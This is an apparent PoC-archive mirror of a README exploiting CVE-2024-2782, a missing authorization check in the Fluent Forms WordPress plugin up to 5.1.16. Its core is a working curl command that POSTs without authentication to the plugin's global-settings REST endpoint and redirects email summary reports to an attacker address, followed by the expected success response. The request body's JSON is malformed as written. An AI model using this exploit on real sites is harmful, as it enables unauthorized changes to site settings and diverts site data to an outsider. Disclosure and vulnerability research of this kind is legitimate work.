Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-2782 PoC — Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization

Source
https://github.com/whale93/CVE-2024-2782-PoC
Associated Vulnerability
Title:Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization to Setting Manipulation (CVE-2024-2782)
Description:The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.
Description
CVE-2024-2782 Proof-of-Concept
Readme
# CVE-2024-2782-PoC
CVE-2024-2782 Proof-of-Concept 

The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.

**Prerequisites**
- WordPress site with Contact Form – Fluent Forms ≤ 5.1.16 active.
- Attacker can reach the site’s REST API (no authentication needed).

**Exploit Command**
```
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
  -H "Content-Type: application/json"
  -d '{
  "key": "emailSummarySettings",
  "email_report": "{"send_to_type":"custom","custom_recipients":"attacker@malicious.com"}"
}'
```
Expected Response
```
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true
```

**Screenshot**
<img width="1117" height="435" alt="image" src="https://github.com/user-attachments/assets/d94eab04-e436-4a2e-b9b2-b6cc39f95a50" />

Verify changes in WordPress database
<img width="940" height="208" alt="image" src="https://github.com/user-attachments/assets/0faa643f-6932-488b-abd0-edbc0070f78d" />
File Snapshot

 [4.0K]  /data/pocs/f20738b598e258bf62f7453583c17a347a8ee625
└── [1.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →